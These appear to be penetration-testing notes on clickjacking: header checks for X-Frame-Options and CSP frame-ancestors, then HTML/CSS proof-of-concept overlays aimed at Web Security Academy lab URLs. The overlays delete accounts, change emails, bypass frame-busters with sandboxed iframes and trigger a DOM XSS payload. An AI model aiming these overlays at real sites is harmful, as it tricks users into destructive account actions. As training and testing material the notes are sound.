Clickjacking

Clickjacking is an attack that tricks users into clicking on something different from what they perceive, usually by overlaying invisible iframes.

Methodology

Black Box Testing

1. Visit all pages of the application and note the response headers.

2. Look for the following headers:

   • X-Frame-Options

   • Content-Security-Policy

3. Evaluate the headers:

   • If X-Frame-Options is set to DENY or SAMEORIGIN, the application is likely not vulnerable to clickjacking.

   • If the Content-Security-Policy header includes the frame-ancestors directive and it is set to 'none' or 'self', the application is also likely protected.

4. If the frame-ancestors directive contains a domain (e.g., *.trusted.com), review it for:

   • Wildcard configurations

   • Misconfigurations or overly permissive policies

5. Test any identified instances where framing is allowed to verify clickjacking vulnerabilities.

---

White Box Testing

1. Identify the framework used by the application.

2. Identify existing defenses related to clickjacking.

3. Identify any libraries used to configure security headers.

4. Review the header configurations and ensure they are set securely.

5. Test the identified instances of clickjacking and develop proof-of-concept exploits where applicable.

POC - Basic clickjacking with CSRF token protection

<style>
		iframe {
			position:relative;
			width:1000px;
			height:1000px;
			opacity:1;
			z-index:2;
			}
		div {
			position:absolute;
			width:300px;
			height:400px;
			z-index:1;
			}
</style>
<div>click</div>
<iframe src="https://0a21002e04091c0a81cf6be700310017.web-security-academy.net/my-account/delete"></iframe>

POC - Clickjacking with form input data prefilled from a URL paramete

<style>
		iframe {
			position:relative;
			width:1000px;
			height:800px;
			opacity:0.00000001;
			z-index:2;
			}
		div {
			position:absolute;
			top:455px;
			left:80px;
			z-index:1;
			}
</style>
<div>Click me</div>
<iframe  src="https://0a4800c9043cfe8887aab0b8007e0009.web-security-academy.net/my-account?email=pwned@admin-user.net"></iframe>

POC - Bypass frame breaking scripts protections

A common client-side protection enacted through the web browser is to use frame busting or frame breaking scripts. An effective attacker workaround against frame busters is to use the HTML5 iframe sandbox attribute. Both the allow-forms and allow-scripts values permit the specified actions within the iframe but top-level navigation is disabled. This inhibits frame busting behaviors while allowing functionality within the targeted site.

If see This page cannot be framed use sandbox="allow-forms to bypass it

<style>
		iframe {
			position:relative;
			width:1000px;
			height:800px;
			opacity:0.50;
			z-index:2;
			}
		div {
			position:absolute;
			top:455px;
			left:80px;
			z-index:1;
			}
</style>
<div>Click me</div>
<iframe sandbox="allow-forms" src="https://0a4a00ea0359905080cd71c100c100b7.web-security-academy.net/my-account?email=pwned@compromised-user.com"></iframe>

POC -Exploiting clickjacking vulnerability to trigger DOM-based XSS

<style>
		iframe {
			position:relative;
			width:1000px;
			height:1000px;
			opacity:0.0000001;
			z-index:2;
			}
		div {
			position:absolute;
			top:800px;
			left:76px;
			z-index:1;
			}
</style>
<div>Click me</div>
<iframe src="https://0ae300dd03b6f211807821f600b8007a.web-security-academy.net/feedback?name=%3Cimg%20src=x%20onerror=print()%3E&email=test@test.com&subject=test&message=test"></iframe>

POC - Multistep clickjacking

<style>
	iframe {
		position:relative;
		width:$width_value;
		height: $height_value;
		opacity: $opacity;
		z-index: 2;
	}
   .firstClick, .secondClick {
		position:absolute;
		top:$top_value1;
		left:$side_value1;
		z-index: 1;
	}
   .secondClick {
		top:$top_value2;
		left:$side_value2;
	}
</style>
<div class="firstClick">Test me first</div>
<div class="secondClick">Test me next</div>
<iframe src="YOUR-LAB-ID.web-security-academy.net/my-account"></iframe>